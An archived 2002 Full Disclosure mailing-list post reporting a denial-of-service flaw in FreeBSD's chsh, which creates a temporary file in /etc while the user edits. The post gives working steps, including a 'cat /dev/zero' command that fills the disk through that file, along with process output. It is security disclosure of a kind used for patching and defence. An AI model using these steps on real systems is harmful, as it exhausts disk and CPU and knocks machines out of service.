Full Disclosure mailing list archives
FBSD chsh DoS
From: full-disclosure () lists netsys com (Charles Stevenson)
Date: Thu, 15 Aug 2002 13:00:38 -0600
--4jXrM3lyYWu4nBt5 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable I found an interesting couple of related DoS to do against chsh on FBSD. Basically chsh creates a temporary file in /etc and then launches a user defined EDITOR. Anyways I couldn't find a way to exploit it but I did find a way to be annoying. tty1$ chsh even if you just launch vi you can get the name of the temporary file it created in /etc or just do ls.
ls -l /etc/pw.a1MwaM=20
-rw------- 1 core core 330088448 Aug 15 01:44 /etc/pw.a1MwaM Er that's after I was being annoying hehehe... filled 60G on phased machine. Sorry phased! :D tty2$ cat /dev/zero > /etc/pw.a1MwaM Then go back to your vi session in chsh and :wq!... The results are that basically root can't even remove the file while it's being written to and of course lots of cpu overload abounds. Anyways quotas will stop this but how many admins put user quotas on filesystems that users aren't supposed to be writing to? PID USERNAME PRI NICE SIZE RES STATE TIME WCPU CPU COMMAND 14139 core 55 0 1140K 612K RUN 12:55 90.23% 90.23% chsh 14171 core 30 0 1912K 976K RUN 0:01 7.81% 2.83% top 13083 root 2 0 356K 0K nfsd 3:00 0.00% 0.00% nfsd peace, core --=20 Charles Stevenson (core) <core () bokeoa com> Lab Assistant, College of Eastern Utah San Juan Campus=20 http://www.bokeoa.com/~core/core.asc --4jXrM3lyYWu4nBt5 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQE9W/pVGAuLrxOyeJMRAgEOAKD0s/uzV5BaBcItdgxo1d/7Oe1gnwCfZEay xKWbW17tdXKxdifKOjyG0GE= =yBlp -----END PGP SIGNATURE----- --4jXrM3lyYWu4nBt5--
Current thread:
- FBSD chsh DoS Charles Stevenson (Aug 15)